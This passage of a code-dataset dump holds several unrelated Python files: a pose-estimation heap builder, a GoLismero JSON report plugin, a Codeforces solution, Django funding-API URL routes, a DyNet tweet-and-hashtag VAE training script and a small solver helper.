scores[yCurrent][xCurrent][keypointId] > score:\n localMaximum = False \n break \n if not localMaximum:\n break \n return localMaximum \n\ndef buildPartWithScoreQueue(\n scoreThreshold, localMaximumRadius ,scores \n ):\n [height, width, numKeypoints] = scores.shape \n def identity(x):\n return x['score']\n queue = MaxHeap(height * width * numKeypoints, identity)\n \n for heatmapY in range(height):\n for heatmapX in range(width):\n for 
keypointId in range(numKeypoints):\n score = scores[heatmapY][heatmapX][keypointId]\n if score < scoreThreshold:\n continue \n if scoreIsMaximumInLocalWindow(\n keypointId, score, heatmapY, heatmapX, localMaximumRadius, scores\n ):\n queue.enqueue({'score' : score, 'part': {'heatmapY':heatmapY, 'heatmapX' : heatmapX, 'id': keypointId}})\n return queue \n\n","sub_path":"multi_pose/build_part_with_score_queue.py","file_name":"build_part_with_score_queue.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"82345143","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/Dani/Documents/Projects/Golismero_2.0/src_github/plugins/report/json.py\n# Compiled at: 2014-02-10 15:24:09\n__license__ = '\\nGoLismero 2.0 - The web knife - Copyright (C) 2011-2013\\n\\nAuthors:\\n Daniel Garcia Garcia a.k.a cr0hn | cr0hn<@>cr0hn.com\\n Mario Vilas | mvilas<@>gmail.com\\n\\nGolismero project site: https://github.com/golismero\\nGolismero project mail: golismero.project<@>gmail.com\\n\\nThis program is free software; you can redistribute it and/or\\nmodify it under the terms of the GNU General Public License\\nas published by the Free Software Foundation; either version 2\\nof the License, or (at your option) any later version.\\n\\nThis program is distributed in the hope that it will be useful,\\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\\nGNU General Public License for more details.\\n\\nYou should have received a copy of the GNU General Public License\\nalong with this program; if not, write to the Free Software\\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\\n'\n__all__ = [\n 'JSONOutput']\nfrom golismero.api import VERSION\nfrom golismero.api.audit import get_audit_times, parse_audit_times\nfrom golismero.api.config import Config\nfrom golismero.api.data import Data\nfrom golismero.api.data.db import Database\nfrom golismero.api.logger import Logger\nfrom golismero.api.plugin import ReportPlugin\nfrom datetime import datetime\nfrom warnings import warn\ntry:\n from cjson import encode\n dumps = encode\n\n def dump(obj, fp):\n fp.write(encode(obj))\n\n\nexcept ImportError:\n try:\n from simplejson import dump, dumps\n except ImportError:\n from json import dump, dumps\n\nclass JSONOutput(ReportPlugin):\n \"\"\"\n Dumps the output in JSON format.\n \"\"\"\n EXTENSION = '.json'\n\n def generate_report(self, output_file):\n Logger.log_verbose('Writing audit results to file: %s' % output_file)\n report_data = self.get_report_data()\n self.serialize_report(output_file, report_data)\n del report_data\n self.launch_command(output_file)\n\n def serialize_report(self, output_file, report_data):\n \"\"\"\n Serialize the data given as a Python dictionary into the format\n supported by this plugin.\n\n :param output_file: Output file for this report plugin.\n :type output_file: str\n\n :param report_data: Report data returned by :ref:`get_report_data`().\n :type report_data: dict(str -> *)\n \"\"\"\n with open(output_file, 'wb') as (fp):\n dump(report_data, fp)\n\n def test_data_serialization(self, data):\n \"\"\"\n Serialize a single Data object converted into a Python dictionary\n in the format supported by this plugin.\n\n This allows the plugin to test if the given Data object 
would be\n serialized correctly, allowing better error control.\n\n :param data: Single Data object converted into a Python dictionary.\n :type data: dict(str -> *)\n\n :raises Exception: The data could not be serialized.\n \"\"\"\n dumps(data)\n\n def get_report_data(self):\n \"\"\"\n Get the data to be included in the report as a Python dictionary.\n There are two supported modes: \"nice\" and \"dump\". The output mode is\n taken directly from the plugin configuration.\n\n :returns: Data to include in the report.\n :rtype: dict(str -> *)\n \"\"\"\n self.__full_report = not Config.audit_config.only_vulns\n report_time = str(datetime.utcnow())\n start_time, stop_time = get_audit_times()\n start_time, stop_time, run_time = parse_audit_times(start_time, stop_time)\n mode = Config.plugin_args.get('mode', 'dump')\n mode = mode.replace(' ', '')\n mode = mode.replace('\\r', '')\n mode = mode.replace('\\n', '')\n mode = mode.replace('\\t', '')\n mode = mode.lower()\n if mode not in ('dump', 'nice'):\n Logger.log_error('Invalid output mode: %s' % mode)\n mode = 'dump'\n self.__dumpmode = mode == 'dump'\n Logger.log_more_verbose('Output mode: %s' % ('dump' if self.__dumpmode else 'nice'))\n root = dict()\n if self.__dumpmode:\n root['version'] = 'GoLismero ' + VERSION\n else:\n root['GoLismero Version'] = 'GoLismero ' + VERSION\n if self.__dumpmode:\n root['report_type'] = 'full' if self.__full_report else 'brief'\n else:\n root['Report Type'] = 'Full' if self.__full_report else 'Brief'\n if self.__dumpmode:\n root['summary'] = {'audit_name': Config.audit_name, 'start_time': start_time, \n 'stop_time': stop_time, \n 'run_time': run_time, \n 'report_time': report_time}\n else:\n root['Summary'] = {'Audit Name': Config.audit_name, 'Start Time': start_time, \n 'Stop Time': stop_time, \n 'Run Time': run_time, \n 'Report Time': report_time}\n if self.__dumpmode:\n wildcards = [ '*.' + x for x in Config.audit_scope.roots ]\n root['audit_scope'] = {'addresses': Config.audit_scope.addresses, 'roots': wildcards, \n 'domains': Config.audit_scope.domains, \n 'web_pages': Config.audit_scope.web_pages}\n else:\n domains = [ '*.' 
+ x for x in Config.audit_scope.roots ]\n domains.extend(Config.audit_scope.domains)\n domains.sort()\n root['Audit Scope'] = {'IP Addresses': Config.audit_scope.addresses, \n 'Domains': domains, \n 'Web Pages': Config.audit_scope.web_pages}\n key_vuln = 'vulnerabilities' if self.__dumpmode else 'Vulnerabilities'\n key_res = 'resources' if self.__dumpmode else 'Assets'\n key_info = 'informations' if self.__dumpmode else 'Evidences'\n key_fp = 'false_positives' if self.__dumpmode else 'False Positives'\n root[key_vuln] = dict()\n root[key_res] = dict()\n root[key_info] = dict()\n root[key_fp] = dict()\n self.__vulnerable = set()\n try:\n datas = self.__collect_vulns(False)\n if datas or self.__full_report:\n fp = self.__collect_vulns(True)\n self.__fp = set(fp)\n try:\n if datas:\n self.__add_data(root[key_vuln], datas, Data.TYPE_VULNERABILITY)\n datas = self.__collect_data(Data.TYPE_RESOURCE)\n if datas:\n self.__add_data(root[key_res], datas, Data.TYPE_RESOURCE)\n datas = self.__collect_data(Data.TYPE_INFORMATION)\n if datas:\n self.__add_data(root[key_info], datas, Data.TYPE_INFORMATION)\n finally:\n self.__fp.clear()\n\n if self.__full_report and fp:\n self.__add_data(root[key_fp], fp, Data.TYPE_VULNERABILITY)\n finally:\n self.__vulnerable.clear()\n\n return root\n\n def __iterate_data(self, identities=None, data_type=None, data_subtype=None):\n if identities is None:\n identities = list(Database.keys(data_type))\n if identities:\n for page in xrange(0, len(identities), 100):\n for data in Database.get_many(identities[page:page + 100], data_type):\n yield data\n\n return\n\n def __collect_data(self, data_type):\n if self.__full_report:\n datas = [ data.identity for data in self.__iterate_data(data_type=data_type)\n ]\n else:\n datas = [ data.identity for data in self.__iterate_data(data_type=data_type) if data.identity in self.__vulnerable\n ]\n datas.sort()\n return datas\n\n def __collect_vulns(self, fp_filter):\n vulns = []\n for vuln in self.__iterate_data(data_type=Data.TYPE_VULNERABILITY):\n if bool(vuln.false_positive) == fp_filter:\n vulns.append(vuln.identity)\n if fp_filter:\n self.__vulnerable.difference_update(vuln.links)\n else:\n self.__vulnerable.update(vuln.links)\n\n vulns.sort()\n return vulns\n\n def __add_data(self, parent, datas, data_type):\n for data in self.__iterate_data(datas, data_type):\n i = data.identity\n d = i\n try:\n if self.__dumpmode:\n d = data.to_dict()\n else:\n d = data.display_properties\n self.test_data_serialization(d)\n except Exception:\n from pprint import pformat\n warn('Cannot serialize data:\\n%s' % pformat(d), RuntimeWarning)\n continue\n\n parent[i] = d","sub_path":"pycfiles/golismero-2.0.3-1.tar/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":9083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"380962554","text":"# author: mofhu@github\n# A. 
Sum\n\nt = int(input())\n\nfor ncase in range(1, t+1):\n abc = [int(s) for s in input().split(' ')]\n abc.sort()\n # print(abc)\n if abc[0] + abc[1] == abc[2]:\n print('YES')\n else:\n print('NO')\n\n\n\n\n","sub_path":"codeforces/Round827/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"193350221","text":"from django.conf.urls import patterns, include, url\nfrom surlex.dj import surl\nfrom .views import (OrderList, OrderDetail, OrderDonationDetail, PaymentProfileCurrent, VoucherDetail,\n OrderVoucherList, OrderVoucherDetail, VoucherDonationList, VoucherDonationDetail,\n CustomVoucherRequestList, OrderDonationList, DocDataDirectDebitCurrent, PaymentCurrent)\n\nurlpatterns = patterns('',\n # Orders\n url(r'^orders/$', OrderList.as_view(), name='fund-order-list'),\n surl(r'^orders/<pk:#>$', OrderDetail.as_view(), name='fund-order-detail'),\n surl(r'^orders/<order_id:#>/donations/$', OrderDonationList.as_view(), name='fund-order-donation-list'),\n surl(r'^orders/<order_id:#>/donations/<pk:#>$', OrderDonationDetail.as_view(), name='fund-order-donation-detail'),\n surl(r'^orders/<order_id:#>/vouchers/$', OrderVoucherList.as_view(), name='fund-order-voucher-list'),\n surl(r'^orders/<order_id:#>/vouchers/<pk:#>$', OrderVoucherDetail.as_view(), name='fund-order-voucher-detail'),\n\n # Current Order (i.e. the server-side shopping cart).\n url(r'^orders/current$', OrderDetail.as_view(), {'alias': 'current'}, name='fund-order-detail'),\n url(r'^orders/current/donations/$', OrderDonationList.as_view(), {'alias': 'current'}, name='fund-order-donation-list'),\n surl(r'^orders/current/donations/<pk:#>$', OrderDonationDetail.as_view(), {'alias': 'current'}, name='fund-order-donation-detail'),\n url(r'^orders/current/vouchers/$', OrderVoucherList.as_view(), {'alias': 'current'}, name='fund-order-voucher-list'),\n surl(r'^orders/current/vouchers/<pk:#>$', OrderVoucherDetail.as_view(), {'alias': 'current'}, name='fund-order-voucher-detail'),\n\n # Vouchers\n surl(r'^vouchers/<code:s>$', VoucherDetail.as_view(), name='voucher-detail'),\n surl(r'^vouchers/<code:s>/donations/$', VoucherDonationList.as_view(), name='voucher-donation-list'),\n surl(r'^vouchers/<code:s>/donations/<pk:#>$', VoucherDonationDetail.as_view(), name='voucher-donation-list'),\n surl(r'^customvouchers/$', CustomVoucherRequestList.as_view(), name='custom-voucher-request-list'),\n\n # Payments\n url(r'^paymentprofiles/current$', PaymentProfileCurrent.as_view(), name='payment-profile-current'),\n url(r'^docdatadirectdebit/current$', DocDataDirectDebitCurrent.as_view(), name='direct-debit-current'),\n url(r'^payments/current$', PaymentCurrent.as_view(), name='payment-current'),\n # The Payment REST API.\n url(r'', include('apps.cowry.urlsapi')),\n)\n","sub_path":"apps/fund/urlsapi.py","file_name":"urlsapi.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"38515436","text":"import random\nimport spacy\nimport math\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom collections import defaultdict, Counter\nfrom time import time\nfrom tqdm import tqdm\n\n#from sklearn.naive_bayes import MultinomialNB\n#from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nimport string\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nimport 
dynet_config\ndynet_config.set(mem=4096, random_seed=12345, autobatch=True) # was 2048 mem\ndynet_config.set_gpu()\n\nimport dynet as dy\n\ndyparams = dy.DynetParams()\n#dyparams.init()\ndyparams.set_requested_gpus(1)\n\nimport pdb\n\n\nprint(\"Loading spaCy...\", end=' ')\nnlp = spacy.load('en')\nassert nlp.path is not None\nprint ('done.')\n\n\nMAX_LEN = 100\nNUM_TAGS = 3883\n# VOCAB_CAP = 10000\nVOCAB_CAP = 50000\n\nUNK = '<UNK>'\nSTART = '<S>'\nEND = '</S>'\n\n\n# # Load Data for Parsing\nprint(\"Loading data...\")\n\nwith open('/usr0/home/mamille2/twitter/data/huang2016/huang2016_train.aligned.pkl', 'rb') as f:\n# twitter_texts, twitter_tags, twitter_histories = pickle.load(f)\n twitter_texts, twitter_tags, _ = pickle.load(f)\n# , twitter_tags, _ = pickle.load(f)\n \nwith open('/usr0/home/mamille2/twitter/data/huang2016/huang2016_valid.aligned.pkl', 'rb') as f:\n# dev_texts, dev_tags, dev_histories = pickle.load(f)\n dev_texts, dev_tags, _ = pickle.load(f)\n# _, dev_tags, _ = pickle.load(f)\n \nwith open('/usr0/home/mamille2/twitter/data/huang2016/huang2016_test.aligned.pkl', 'rb') as f:\n# _, test_tags, _ = pickle.load(f)\n test_texts, test_tags, _ = pickle.load(f)\n \n\n# # Load Data\n\ndef index_tags(tags_list, tag_set, tag_dict):\n return [[tag_dict[tag] for tag in tags if tag in tag_set] for tags in tags_list]\n\n\n# Extract tag set\ntag_counts = defaultdict(int)\nfor t in twitter_tags:\n for x in t:\n tag_counts[x] += 1\n\ntop_k_tags = set(sorted(tag_counts, key=tag_counts.get, reverse=True)[:NUM_TAGS])\n\ntag_set = set()\nfor t in twitter_tags:\n tag_set.update(set([x for x in t if x in top_k_tags]))\n \ntag_set = sorted(tag_set)\nprint ('{} unique tags.'.format(len(tag_set)))\n\ntag_indexes = defaultdict(lambda: len(tag_indexes))\nparsed_tags = index_tags(twitter_tags, tag_set, tag_indexes)\nidx_to_tag = {v: k for k, v in tag_indexes.items()}\n\n\ntry:\n print ('Attempting to open preprecessed TRAIN data ... ', end='')\n# raise NotImplemented\n \n t0=time()\n with open('/usr0/home/mamille2/twitter/data/huang2016/parsed_twitter_train_data_no_histories.pkl', 'rb') as f:\n vocab, parsed_texts, parsed_tags = pickle.load(f)\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \nexcept:\n print ('FAIL.')\n \n print ('\\tParsing texts ... ', end='')\n t0=time()\n parsed_texts = [[str(w) for w in t][:MAX_LEN] for t in nlp.pipe([x.encode('ascii', 'ignore').decode('ascii').lower() for x in twitter_texts], n_threads=3, batch_size=20000)]\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \n print ('\\tCounting words ... ', end='')\n word_counts = defaultdict(int)\n for t in parsed_texts:\n for x in t:\n word_counts[x] += 1\n top_k_words = set(sorted(word_counts, key=word_counts.get, reverse=True)[:VOCAB_CAP-3])\n\n word_set = set()\n for t in parsed_texts:\n word_set.update(set([x for x in t if x in top_k_words]))\n print ('DONE. ({:.3f}s)'.format(time()-t0)) \n \n vocab = defaultdict(lambda: len(vocab))\n print ('\\tIndexing texts ... ', end='')\n t0=time()\n parsed_texts = [[vocab[START]] + [(vocab[w] if w in word_set else vocab[UNK]) for w in t] + [vocab[END]] for t in parsed_texts]\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \n unk_idx = vocab[UNK]\n sos_idx = vocab[START]\n eos_idx = vocab[END]\n \n print ('\\tSAVING parsed data ... ', end='')\n t0=time()\n with open('parsed_twitter_train_data_no_histories.pkl', 'wb') as f:\n pickle.dump((dict(vocab), parsed_texts, parsed_tags), f) \n print ('DONE. 
({:.3f}s)'.format(time()-t0))\n\nunk_idx = vocab[UNK]\nsos_idx = vocab[START]\neos_idx = vocab[END]\n# Set unknown words to be UNK --> note as written, the paper does not indicate that any training data is labeled as UNK...\nvocab = defaultdict(lambda: unk_idx, vocab)\nidx_to_vocab = {v: k for k, v in vocab.items()}\n\nVOCAB_SIZE = len(vocab)\nprint ('Vocab size:', VOCAB_SIZE)\n\n\n# Check number of tags\n#tagc = Counter([t for tags in parsed_tags for t in tags])\n#len(tagc)\n\n\ntry:\n print ('Attempting to open preprecessed DEV and TEST data ... ', end='')\n# raise NotImplemented\n \n t0=time()\n with open('/usr0/home/mamille2/twitter/data/huang2016/parsed_twitter_test_dev_data_no_histories.pkl', 'rb') as f:\n parsed_dev_texts, parsed_test_texts = pickle.load(f)\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \nexcept:\n print ('FAIL.')\n print ('\\tParsing texts ... ', end='')\n t0=time()\n parsed_dev_texts = [[vocab[START]] + [vocab[str(w)] for w in t if not w.is_stop][:MAX_LEN] + [vocab[END]] for t in nlp.pipe([x.encode('ascii', 'ignore').decode('ascii').lower() for x in dev_texts], n_threads=3, batch_size=20000)]\n parsed_test_texts = [[vocab[START]] + [vocab[str(w)] for w in t if not w.is_stop][:MAX_LEN] + [vocab[END]] for t in nlp.pipe([x.encode('ascii', 'ignore').decode('ascii').lower() for x in test_texts], n_threads=3, batch_size=20000)]\n print ('DONE. ({:.3f}s)'.format(time()-t0))\n \n print ('\\tSAVING parsed data ... ', end='')\n t0=time()\n with open('parsed_twitter_test_dev_data_no_histories.pkl', 'wb') as f:\n pickle.dump((parsed_dev_texts, parsed_test_texts), f) \n print ('DONE. ({:.3f}s)'.format(time()-t0))\n\n\ntrain = list(zip(parsed_texts, parsed_tags))\ndev_tags = index_tags(dev_tags, tag_set, tag_indexes)\ndev = list(zip(parsed_dev_texts, dev_tags))\ntest_tags = index_tags(test_tags, tag_set, tag_indexes)\ntest = list(zip(parsed_test_texts, test_tags))\n\n\n# # Model Parameters and Settings\nprint(\"Building model...\")\n\nEMBEDDING_DIM = 128\n# HIDDEN_DIM = 256\nHIDDEN_DIM = 512\nQ_DIM = 512\nDROPOUT = 0.2\n# DROPOUT = 0\nALPHA = 0.01\nEPSILON_MAX = .9\nEPSILON_MIN = 0.00\nKL_WEIGHT_START = 0.0\n\nBATCH_SIZE = 16\nPATIENCE = 3\n\n\n# Initialize dynet model\nmodel = dy.ParameterCollection()\n\n# The paper uses AdaGrad\ntrainer = dy.AdamTrainer(model)\n\n# Embedding parameters\nembed = model.add_lookup_parameters((VOCAB_SIZE, EMBEDDING_DIM))\n\n# Recurrent layers for tweet encoding\nlstm_encode = dy.LSTMBuilder(1, EMBEDDING_DIM, HIDDEN_DIM, model)\nlstm_decode = dy.LSTMBuilder(1, EMBEDDING_DIM, Q_DIM, model)\n\n# Encoder MLP for tweet encoding\nW_mu_tweet_p = model.add_parameters((Q_DIM, HIDDEN_DIM))\nV_mu_tweet_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_mu_tweet_p = model.add_parameters((Q_DIM))\n\nW_sig_tweet_p = model.add_parameters((Q_DIM, HIDDEN_DIM))\nV_sig_tweet_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_sig_tweet_p = model.add_parameters((Q_DIM))\n\nW_mu_tag_p = model.add_parameters((Q_DIM, NUM_TAGS))\nV_mu_tag_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_mu_tag_p = model.add_parameters((Q_DIM))\n\nW_sig_tag_p = model.add_parameters((Q_DIM, NUM_TAGS))\nV_sig_tag_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_sig_tag_p = model.add_parameters((Q_DIM))\n\nW_mu_p = model.add_parameters((Q_DIM, 2 * HIDDEN_DIM))\nb_mu_p = model.add_parameters((Q_DIM))\n\nW_sig_p = model.add_parameters((Q_DIM, 2 * HIDDEN_DIM))\nb_sig_p = model.add_parameters((Q_DIM))\n\nW_hidden_p = model.add_parameters((HIDDEN_DIM, Q_DIM))\nb_hidden_p = 
model.add_parameters((HIDDEN_DIM))\n\nW_tweet_softmax_p = model.add_parameters((VOCAB_SIZE, Q_DIM))\nb_tweet_softmax_p = model.add_parameters((VOCAB_SIZE))\n\nW_tag_output_p = model.add_parameters((NUM_TAGS, HIDDEN_DIM))\nb_tag_output_p = model.add_parameters((NUM_TAGS))\n\n\n\ndef reparameterize(mu, log_sigma_squared):\n d = mu.dim()[0][0]\n sample = dy.random_normal(d)\n covar = dy.exp(log_sigma_squared * 0.5)\n\n return mu + dy.cmult(covar, sample)\n\ndef mlp(x, W, V, b):\n return V * dy.tanh(W * x + b)\n\n\ndef calc_loss(sent, epsilon=0.0):\n #dy.renew_cg()\n \n # Transduce all batch elements with an LSTM\n src = sent[0]\n tags = sent[1]\n\n # initialize the LSTM\n init_state_src = lstm_encode.initial_state()\n\n # get the output of the first LSTM\n src_output = init_state_src.add_inputs([embed[x] for x in src])[-1].output()\n\n # Now compute mean and standard deviation of source hidden state.\n W_mu_tweet = dy.parameter(W_mu_tweet_p)\n V_mu_tweet = dy.parameter(V_mu_tweet_p)\n b_mu_tweet = dy.parameter(b_mu_tweet_p)\n\n W_sig_tweet = dy.parameter(W_sig_tweet_p)\n V_sig_tweet = dy.parameter(V_sig_tweet_p)\n b_sig_tweet = dy.parameter(b_sig_tweet_p)\n \n # Compute tweet encoding\n mu_tweet = dy.dropout(mlp(src_output, W_mu_tweet, V_mu_tweet, b_mu_tweet), DROPOUT)\n log_var_tweet = dy.dropout(mlp(src_output, W_sig_tweet, V_sig_tweet, b_sig_tweet), DROPOUT)\n \n W_mu_tag = dy.parameter(W_mu_tag_p)\n V_mu_tag = dy.parameter(V_mu_tag_p)\n b_mu_tag = dy.parameter(b_mu_tag_p)\n\n W_sig_tag = dy.parameter(W_sig_tag_p)\n V_sig_tag = dy.parameter(V_sig_tag_p)\n b_sig_tag = dy.parameter(b_sig_tag_p)\n \n # Compute tag encoding\n tags_tensor = dy.sparse_inputTensor([tags], np.ones((len(tags),)), (NUM_TAGS,))\n \n mu_tag = dy.dropout(mlp(tags_tensor, W_mu_tag, V_mu_tag, b_mu_tag), DROPOUT)\n log_var_tag = dy.dropout(mlp(tags_tensor, W_sig_tag, V_sig_tag, b_sig_tag), DROPOUT)\n \n # Combine encodings for mean and diagonal covariance\n W_mu = dy.parameter(W_mu_p)\n b_mu = dy.parameter(b_mu_p)\n\n W_sig = dy.parameter(W_sig_p)\n b_sig = dy.parameter(b_sig_p)\n \n # Slowly phase out getting both inputs\n if random.random() < epsilon:\n mask = dy.zeros(HIDDEN_DIM)\n else:\n mask = dy.ones(HIDDEN_DIM)\n \n if random.random() < 0.5:\n mu_tweet = dy.cmult(mu_tweet, mask)\n log_var_tweet = dy.cmult(log_var_tweet, mask)\n else:\n mu_tag = dy.cmult(mu_tag, mask)\n log_var_tag = dy.cmult(log_var_tag, mask)\n \n mu = dy.affine_transform([b_mu, W_mu, dy.concatenate([mu_tweet, mu_tag])])\n log_var = dy.affine_transform([b_sig, W_sig, dy.concatenate([log_var_tweet, log_var_tag])])\n\n # KL-Divergence loss computation\n #kl_loss = -0.5 * dy.sum_elems(1 + log_var - dy.pow(mu, dy.inputVector([2])) - dy.exp(log_var))\n\n z = reparameterize(mu, log_var)\n\n # now step through the output sentence\n all_losses = []\n\n current_state = lstm_decode.initial_state().set_s([z, dy.tanh(z)])\n prev_word = src[0]\n W_sm = dy.parameter(W_tweet_softmax_p)\n b_sm = dy.parameter(b_tweet_softmax_p)\n\n for next_word in src[1:]:\n # feed the current state into the\n \n current_state = current_state.add_input(embed[prev_word])\n output_embedding = current_state.output()\n\n s = dy.affine_transform([b_sm, W_sm, output_embedding])\n \n all_losses.append(dy.pickneglogsoftmax(s, next_word))\n\n # Slowly phase out teacher forcing (this may be slow??)\n if random.random() < epsilon:\n p = dy.softmax(s).npvalue()\n prev_word = np.random.choice(VOCAB_SIZE, p=p/p.sum())\n else:\n prev_word = next_word\n \n softmax_loss = dy.esum(all_losses)\n\n 
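# Tag-prediction head: decode the latent code z through a tanh layer with\n    # dropout, map it to per-tag probabilities with a logistic output layer,\n    # and score it against the multi-hot tag vector with binary log loss.\n    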
W_hidden = dy.parameter(W_hidden_p)\n b_hidden = dy.parameter(b_hidden_p)\n \n W_out = dy.parameter(W_tag_output_p)\n b_out = dy.parameter(b_tag_output_p)\n \n h = dy.dropout(dy.tanh(b_hidden + W_hidden * z), DROPOUT)\n o = dy.logistic(b_out + W_out * h)\n \n crossentropy_loss = dy.binary_log_loss(o, tags_tensor)\n \n #return kl_loss, softmax_loss, crossentropy_loss\n return softmax_loss, crossentropy_loss\n\n\n\n# Training\n#print(\"Training...\")\nprint ('Using batch size of {}.'.format(BATCH_SIZE))\n\nepsilon = EPSILON_MIN\n#kl_weight = KL_WEIGHT_START\nsteps = 0\nstrikes = 0\nlast_dev_loss = np.inf\nfor ITER in range(100):\n # Perform training\n random.shuffle(train)\n \n batches = [train[i:i + BATCH_SIZE] for i in range(0, len(train), BATCH_SIZE)]\n \n #train_words, train_loss, train_kl_loss, train_reconstruct_loss, total_tag_loss = 0, 0.0, 0.0, 0.0, 0.0\n train_words, train_loss, train_reconstruct_loss, total_tag_loss = 0, 0.0, 0.0, 0.0\n start = time()\n \n print()\n print ('Training ... Iteration:', ITER, 'Epsilon:', epsilon)\n for i, batch in enumerate(tqdm(batches)):\n dy.renew_cg()\n #dy.renew_cg(immediate_compute=True, check_validity=True) # makes program die--is_valid() not implemented for CUDA yet\n #dy.renew_cg(immediate_compute=True)\n losses = []\n for sent_id, sent in enumerate(batch):\n if len(sent[1]) < 1 or len(sent[0]) < 3:\n continue\n #kl_loss, softmax_loss, tag_loss = calc_loss(sent, epsilon)\n softmax_loss, tag_loss = calc_loss(sent, epsilon)\n #total_loss = dy.esum([kl_loss, softmax_loss, tag_loss])\n #train_loss += total_loss.value()\n \n # Gradually increase KL-Divergence loss\n# if steps < 15000:\n# kl_weight = 1 / (1 + np.exp(-0.001 * steps + 5))\n# else:\n# kl_weight = 1.0\n\n # Zero out KL weight\n #kl_weight = 0.0\n #kl_weight = 1e-6\n \n #losses.append(dy.esum([kl_weight * kl_loss, softmax_loss, tag_loss]))\n losses.append(dy.esum([softmax_loss, tag_loss])) # fails with gradient nan error\n\n # Record the KL loss and reconstruction loss separately help you monitor the training.\n #train_kl_loss += kl_loss.value()\n train_reconstruct_loss += softmax_loss.value()\n total_tag_loss += tag_loss.value()\n \n train_words += len(sent[0])\n steps += 1\n \n # Batch update\n batch_loss = dy.esum(losses)/BATCH_SIZE\n train_loss += batch_loss.value()\n batch_loss.backward()\n #batch_loss.backward(full=True)\n pdb.set_trace()\n trainer.update() # fails here with gradient nan or inf error\n \n \n #total_loss.backward()\n #trainer.update()\n #if (sent_id + 1) % 1000 == 0:\n\n # print(\"--finished %r sentences\" % (sent_id + 1))\n\n # Gradually increase KL-Divergence loss\n if steps < 100000:\n epsilon = .9 / (1 + np.exp(-0.0001 * steps + 5))\n else:\n epsilon = EPSILON_MAX\n \n #epsilon = min(EPSILON_MAX, epsilon + 0.05)\n try:\n train_ppl = math.exp(train_loss / train_words)\n except OverflowError as e:\n train_ppl = 1e6\n\n# print(\"iter %r: train loss/word=%.4f, kl loss/word=%.4f, reconstruction loss/word=%.4f, ppl=%.4f, tag loss=%.4f\" % (\n# ITER, train_loss / train_words, train_kl_loss / train_words, train_reconstruct_loss / train_words,\n# train_ppl, total_tag_loss / len(train)))\n\n print(\"iter %r: train loss/word=%.4f, reconstruction loss/word=%.4f, ppl=%.4f, tag loss=%.4f\" % (\n ITER, train_loss / train_words, train_reconstruct_loss / train_words,\n train_ppl, total_tag_loss / len(train)))\n\n # Evaluate on dev set\n #dev_words, dev_loss, dev_kl_loss, dev_reconstruct_loss, dev_tag_loss = 0, 0.0, 0.0, 0.0, 0.0\n dev_words, dev_loss, dev_reconstruct_loss, 
dev_tag_loss = 0, 0.0, 0.0, 0.0\n start = time()\n print ('Evaluating batch ... ')\n for sent_id, sent in enumerate(tqdm(dev)):\n dy.renew_cg()\n if len(sent[1]) < 1 or len(sent[0]) < 3:\n continue\n #kl_loss, softmax_loss, tag_loss = calc_loss(sent)\n softmax_loss, tag_loss = calc_loss(sent)\n\n #dev_kl_loss += kl_loss.value()\n dev_reconstruct_loss += softmax_loss.value()\n dev_tag_loss += tag_loss.value()\n #dev_loss += kl_loss.value() + softmax_loss.value() + tag_loss.value()\n dev_loss += softmax_loss.value() + tag_loss.value() # take out kl_loss\n\n dev_words += len(sent[0])\n trainer.update()\n\n try:\n dev_ppl = math.exp(dev_loss / dev_words)\n except:\n dev_ppl = 1e6\n\n# print(\"iter %r: dev loss/word=%.4f, kl loss/word=%.4f, reconstruction loss/word=%.4f, ppl=%.4f, tag loss=%.2f\" % (\n# ITER, dev_loss / dev_words, dev_kl_loss / dev_words, dev_reconstruct_loss / dev_words,\n# dev_ppl, dev_tag_loss / len(dev)))\n\n print(\"iter %r: dev loss/word=%.4f, reconstruction loss/word=%.4f, ppl=%.4f, tag loss=%.2f\" % (\n ITER, dev_loss / dev_words, dev_reconstruct_loss / dev_words,\n dev_ppl, dev_tag_loss / len(dev)))\n\n if dev_loss > last_dev_loss and ITER > 9:\n strikes += 1\n else:\n strikes = 0\n last_dev_loss = dev_loss\n model.save('/usr0/home/mamille2/twitter/models/tweet_tag_vae.best.weights')\n \n if strikes >= PATIENCE:\n print ('Early stopping after {} iterations.')\n break\n\n\ntry:\n\toutpath = '/usr0/home/mamille2/twitter/models/trained_project.weights'\n\tprint(\"Saving model weights to {}...\".format(outpath), end=' ')\n\tmodel.save(outpath)\n\tprint(\"done.\")\nexcept:\n\tpdb.set_trace()\n","sub_path":"train_model_nokl.py","file_name":"train_model_nokl.py","file_ext":"py","file_size_in_byte":17110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"317387531","text":"from utils.color import color\n\n\nclass Solver:\n def solve(self):\n amber = (255, 192, 0)\n\n if self.solve_method is not None:\n try:\n result = self.solve_method()\n except Exception as e:\n raise Exception(color(f\"WARNING : {e}\", amber))\n else:\n print(result)\n else:\n raise Exception(color(\"WARNING : solve() is undefined\", 